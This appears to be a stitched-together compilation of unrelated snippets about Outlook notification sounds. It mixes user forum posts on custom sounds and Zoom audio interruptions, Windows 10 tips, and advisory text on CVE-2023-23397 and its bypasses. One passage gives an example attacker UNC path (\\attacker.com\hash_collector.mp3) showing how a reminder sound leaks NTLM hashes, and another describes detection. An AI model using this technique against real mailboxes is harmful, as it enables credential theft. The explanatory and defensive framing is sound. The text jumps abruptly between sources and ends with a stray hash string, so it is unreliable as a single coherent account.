Have you had any luck with this? I would also like to know how to change the default 'new mail' notification in outlook for mac. My wife and I both use the same app for work on our respective MacBooks, and it can get very frustrating to hear the same sound for each of our accounts. "Was that yours or mine?" We'd love to know if it can be changed to something else other than the default 'ding' sound. I'm on Catalina, she's using Mojave. Thanks

I apologize for the late reply here. I had my notifications turned off. One thing I noticed since I have been using custom sounds for Outlook on my mac is that every time Outlook has a software update, it reverts the sounds back to the default tones. I have a feeling that your issue is similar and I have a work around that I have been using. It involves creating a shortcut to the folder where the Outlook default sounds are located so you have easy access, and then overriding the sounds anytime they revert back.

I've placed the audio file under "Internal Storage/Notifications" using the file manager under the work profile. In the Outlook app I'm navigating to "Top-left profile icon -> Bottom-left gear icon -> Notifications -> New email sound -> Sound". From this menu I'm able to access all default notification sounds on my device (Samsung Galaxy A23) and set them as the incoming email notification sound. The custom sound I'm trying to select is visible in this menu, but when I try to select it I'm presented with the message "Sorry, the player does not support this type of audio file."

@Andrew Kroeger, Thanks for posting in Q&A. Based on my researching, for the custom notification sound format on Outlook for Android, it can be an audio file that is in one of the following formats: MP3, WAV, or OGG. But from your description, I notice we already tried these format.

For this issue, I notice the affected device is Samsung Galaxy. Could you check on other Android device to see if the same issue exists? And if we set the custom notification sound on Outlook on a device which is not enrolled into Intune, will we have the same issue?

Good afternoon,

Keeping this very brief, does anyone have issues with notification sounds for new chat messages or new Outlook mail received in Citrix Sessions.

Outlook calendar reminders play sound. I've tested this on lots of hardware and the conclusion is, sound notifications for new chats and email messages are not played via Citrix Sessions.

I am getting blasted by email notifications from MS Outlook. Note that I have Windows system sounds set to 'None', so it is not the "system" email notification that I am hearing. It is coming directly from Outlook. However, I can only set app-specific relative volume while they are actively playing a sound. I don't want to send myself an email and race to the sound mixer to try and catch it / set it. Is there way to set relative app volume directly? Ie, without having to have them running and playing sound? Or, as a work-around, is there some way I can put Outlook into a sound-playing loop so that I can easily catch it?

Note that on the PC used for this screenshot, Microsoft Visual Studio had been uninstalled, yet the settings for various sound notifications remain. There should be similar settings for MS Outlook, whether or not it is active.

If none of the sounds suite you, you may even copy the fileWindows Notify Email.wav, reduce its volume using any audio editor, then specify it as the notification sound by using the Browse optionin step 4.

The vulnerability allows an attacker to send the victim an email such that even without the victim reading this email, Outlook will try to play a notification sound from a file specified in attacker's email (weird, huh?). While the more playful among us would immediately think of rickrolling our friends, serious attackers could use this "feature" to extract victim's NTLM hash from their computer. Specifying a sound file on a network location such as \\attacker.com\hash_collector.mp3 would make user's Outlook send a network request to attacker's server, which would then request authentication, and user's computer would respond with user's NTLM hash. For some reason, this also works with hosts on the Internet, where NTLM hashes are usually not being sent.

The official patch from Microsoft surprisingly didn't just axe this weird feature, but rather limited the location of the notification sound that your email sender wants you to hear to Local Intranet and Trusted Zones - if the supplied path is elsewhere, no sound will be played. This means that an attacker can still make your Outlook send your NTLM hash to any computer in the local network without you being able to prevent that - which is great news for attackers sitting in your network trying to elevate their privileges and become you.

Our patch is different to Microsoft's, as we believe theirs unnecessary leaves an important part of attack surface open. We therefore decided to simply enforce the default notification sound and completely ignore what your sender wanted you to hear. Granted, if your eager admin has set up some custom sound file for Outlook notifications, our patch will play the default notification sound instead of that as well.

Update 12/20/2023: Unsurprisingly, a new bypass (assigned CVE-2023-35384) was discovered for the fix of the first bypass for the original fix. Again, it was found by Ben Barnea. Our original patch blocks both the first bypass and this one, because it completely disables sender-chosen notification sounds. We did issue a patch for Outlook 2013 now as we have security-adopted this Office version after it went out of support.

I didn't use to have this issue before, but now whenever there are notifications from other apps/websites (e.g. whatsapp message notifications on whatsapp web) or even error sounds from Windows applications, my zoom audio gets cut off for about 3 seconds.

Hello , please go to your settings--> sound--->Sound control panel and reduce the volume of other sounds by 80% or mute it. By doing this setting, you will not be disturbed by other notification sounds when you are having a meeting. Hope this will help you.

This is a new issue for me and did not happen with older versions of zoom. Changing notification sounds does not help because the audio out of zoom is completely muted, not of lower volume. I specifically notice notifications from outlook and teams causing this.

Was having the same issue w/ Slack, mail. calendar. W/ Slack, go into Slack settings, notifications. You can assign notification sounds to your laptop/desktop speaker. W/ this setting. you do hear slack notifications during zoom calls, but they do not imact your bluetooth speaker used for Zoom. i turn off calendar and mail.

I don't receive sound notifications that are an issue, I get outlook email notifications that pop up and block all sound from zoom for 2-3 seconds. It makes it extremely disruptive. The only work-around I can figure is to shut down all other apps and services.... Zoom you need to fix it.

The issue is only with Zoom while attending on the android platform. I had the issue and finally, I have managed to fix it.

Please go to setting in phone > mostly in sounds & vibration or sounds & notification section you should find > Do not disturb (DND) option > In which you will have "allow to interept" option. This by default would be "turned on".

To fix our issue please turn off this option and try.

Now whatsapp or other notification should not interept your zoom call audio.

Please check and confirm.

CVE-2023-23397 is a vulnerability in Microsoft Outlook that allows a threat actor to craft a message (.msg) file with a custom PidLidReminderFileParameter property that contains a Universal Naming Convention (UNC) path pointing to an attacker controlled Server Message Block (SMB) server. The PidLidReminderFileParameter allows the message sender to set a custom notification sound for items such as meeting notifications.

Cortex XDR running agent version 8.0, with content version 910-49200, and with Advanced API Monitoring enabled, detects the exploitation of CVE-2023-23397 by monitoring the behavior of outlook.exe process. Every time a reminder is played with a sound file path from UNC, an alert will be triggered, with details of the remote path.

To chain these vulnerabilities together, an attacker would have to send an affected Outlook client an email reminder with a custom notification sound. By using the first vulnerability the client would retrieve the sound file from any SMB server. The Server Message Block protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.

On Windows 10, notifications keep you in the loop about things happening around your apps and services, and they also alert you of anything in your system that may require attention. However, each banner that slides out in the bottom-right corner also includes a sound, which can quickly get annoying.

If you constantly receive notifications and muting the system volume or disabling notifications completely is not the solution, Windows 10 includes at least two ways to turn off the sound while still being able to see toast notifications.

After completing the steps, the apps you configured won't play sounds anymore. However, you'll see a banner in the bottom-right corner, and the notification will continue to be listed in Action Center as they arrive.

Once you complete the steps, you'll continue to get toast notifications, and Action Center will work as before. However, you'll not get annoyed with the same sound repeatedly every time a new notification arrives. ff782bc1db
